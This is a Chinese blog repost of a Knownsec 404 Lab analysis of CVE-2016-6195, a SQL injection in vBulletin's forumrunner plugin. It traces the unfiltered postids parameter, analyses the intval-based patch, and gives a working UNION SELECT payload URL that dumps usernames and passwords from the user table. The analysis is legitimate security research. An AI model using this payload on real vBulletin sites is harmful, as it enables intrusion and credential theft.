欢迎光临
我们一直在努力

VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析

分析所用版本4.2.1

漏洞的本质是forumrunner/includes/moderation.php文件中, do_get_spam_data()函数()对参数postids和threadid过滤不严导致SQL注入漏洞, 核心代码如下:

function do_get_spam_data (){?? ????global $vbulletin, $db, $vbphrase;   ????$vbulletin->input->clean_array_gpc('r', array( ????'threadid' => TYPE_STRING, ????'postids' => TYPE_STRING, ????));   ????...   ????}else if ($vbulletin->GPC['postids'] != '') { ????????$postids = $vbulletin->GPC['postids'];   ????????$posts = $db->query_read_slave(" ????????????SELECT post.postid, post.threadid, post.visible, post.title, post.userid, ????????????????thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid ????????????FROM " . TABLE_PREFIX . "post AS post ????????????LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid) ????????????WHERE postid IN ($postids) ????????");

VBulletin程序中并不直接使用$_GET等全局变量获取输入数据,而是使用clean_gpc() 和 clean_array_gpc() 函数来过滤输入数据,而这两个函数并未对STRING类型做严格过滤,而传入的参数postids是作为SRING类型解析,参数postids随后拼接在SQL语句中进行查询,导致SQL注入漏洞。
寻找调用或包含do_get_spam_data()函数的代码,发现forumrunner/support/common_methods.php

??'get_spam_data' => array( ????'include' => 'moderation.php', ????'function' => 'do_get_spam_data', ????),

继续回溯,发现forumrunner/request.php文件包含support/common_methods.php.

...   $processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING)); if (!$processed['cmd']) {?? ????return; }   ...   require_once(MCWD . '/support/common_methods.php');   ...   if (!isset($methods[$processed['cmd']])) {?? ????json_error(ERR_NO_PERMISSION); }    if ($methods[$processed['cmd']]['include']) {?? ????require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']); }    if (isset($_REQUEST['d'])) {?? ????error_reporting(E_ALL); }  $out = call_user_func($methods[$processed['cmd']]['function']);   ...

上面代码中process_input()函数(forumrunner/support/utils.php), 会从$_REQUEST中取值,进行简单的类型转换,STRING类型则原样返回,根据上面代码,可以通过$_REQUEST[‘cmd’]参数调用get_spam_data()函数, 进而调用do_get_spam_data()函数。设置$_REQUEST[‘d’]参数将打开错误报告,有助于SQL注入,当然也可以不设置$_REQUEST[‘d’]参数,这对触发SQL注入漏洞没有影响。剩下的就是使用postids参数构造SQL payload
postids参数注入

payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+

设置断点及变量取值,注入结果如下:
white VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析
从图中可以看出SQL注入语句执行成功,$post[‘title’]变量已经获取了用户名和密码,其中forumid设置为1, 保证下面代码不会进入if条件判断语句中。

while ($post = $db->fetch_array($posts))?? ????{ ????????$forumperms = fetch_permissions($post['forumid']); ????????if??( ????????????!($forumperms & $vbulletin->bf_ugp_forumpermissions['canview']) ????????????????OR ????????????!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads']) ????????????????OR ????????????(!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid']) ????????????) ????????{ ????????????json_error(ERR_NO_PERMISSION); ????????}

补丁分析
includes/general_vb.php文件, fr_clean_ids函数对id类变量进行了整数转换,从而阻止SQL注入攻击。

function fr_clean_ids($list = ”)?? { $arr = explode(‘,’,$list); $cleanarr = array_map(‘intval’,$arr); return implode(‘,’,$cleanarr);?? } forumrunner/include/moderation.php文件, do_get_spam_data函数过滤$postids和$threadid 参数   $vbulletin->GPC[‘postids’] = fr_clean_ids($vbulletin->GPC[‘postids’]);   ...    if ($vbulletin->GPC[‘threadid’] != ”) {?? $threadids = $vbulletin->GPC[‘threadid’];    $threadids = fr_clean_ids($threadids);   ...

Author: janes(知道创宇404安全实验室),原文地址:http://paper.seebug.org/116/

未经允许不得转载:杂术馆 » VBulletin 核心插件 forumrunner SQL注入(CVE-2016-6195)漏洞分析
分享到: 更多 (0)